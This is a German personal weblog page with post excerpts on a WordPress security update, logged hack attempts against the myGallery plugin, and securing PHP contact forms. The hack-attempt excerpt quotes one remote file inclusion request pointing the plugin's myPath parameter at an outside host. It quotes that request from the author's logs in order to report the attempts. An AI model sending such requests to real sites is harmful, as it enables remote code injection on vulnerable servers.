Zu den Artikeln...

dyingeyes weblog: das persönliche Weblog von Boris Stumpf aus Frankfurt am Main

Zur Top-Navigation...

WP 2.8.4 – ich sehe die Rücklichter

Wednesday, den 12. August 2009

Und sie entfernen sich langsam, aber sicher …

Just heute ist WordPress 2.8.4 erschienen, ein reines Sicherheitsupdate. Ursache und Auswirkung des Problems sind für mich aber zum Glück bedeutungslos – und wären es auch, wenn ich 2.8.x benutzte.

Für den Moment ist für mich der 2.8.x-Zug ja abgefahren, ich bleibe deshalb bis auf weiteres bei 2.7.1 stehen. Vielleicht mache zum nächsten Jahresbeginn wieder einen Providerwechsel, dann schaue ich mal weiter, was mit WordPress so passiert.
:sad:

2 Kommentare »

myGallery-Hackversuche

Monday, den 6. Oktober 2008

Eben gerade habe ich bei Reparaturarbeiten an meinem Bad Behavior (BB) (ja, den Fehler von neulich habe ich selbst durch eine kleine Nachlässig­keit hineingestrickt und soeben korrigiert) in der Daten­tabelle von BB mehrere Versuche entdeckt, über ein unsicheres Plugin Dateien einzuschleusen:

/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sexery.de/prc.gif?
(more…)

Comments Off

E-Mail-Formulare absichern

Tuesday, den 16. Oktober 2007

Wenn man in seinen Webprojekten Kontaktformulare (meist in PHP entwickelt) verwendet, mit deren Hilfe der Besucher komfortabel eine E-Mailnachricht an den Seitenbetreiber versenden kann, dann sollte man dafür sorgen, dass solche Formulare nicht missbraucht werden können. Gerade beim Einsatz in Kundenprojekten kann ein Schaden durch nachgewiesenen Missbrauch eines solchen Formulars möglicherweise rechtliche Konsequenzen für den Entwickler haben.

Unliebsame »Gäste« können E-Mail-Formulare auf zweierlei Arten zu eigenen Zwecken »entfremden«:

  1. Zu Einbruchsversuchen auf den Server durch das Einschleusen von gefährlichem Programmcode
  2. Als Plattform zum Versand von Spam mittels eingeschleuster unerwünschter E-Mail-Headerdaten

In Building a Bulletproof Contact Form with PHP, dem aktuellen Artikel des Digital Web Magazine, beschreibt Matthew Pennell die Gefahren im Einzelnen und entwickelt eine mögliche Lösung, ein solches beispielhaftes Kontaktformular gegen Missbrauch abzusichern.

Also Lesebefehl – und ich gehe jetzt bei den schon recht gut abgesicherten Formularen, die ich im Einsatz habe, auch noch einmal ein kleines Sicherungsschräubchen anziehen … :cool:

2 Kommentare »

Seite 1 von 212

2004-2012 | Layout und Theme »ILoveOrange2« v2.03: Boris Stumpf – dyingeyes weblog | Impressum | Wordpress

Zuletzt geschrieben:

Zuletzt Kommentiert:

Kategorien:

↑ nach oben ↑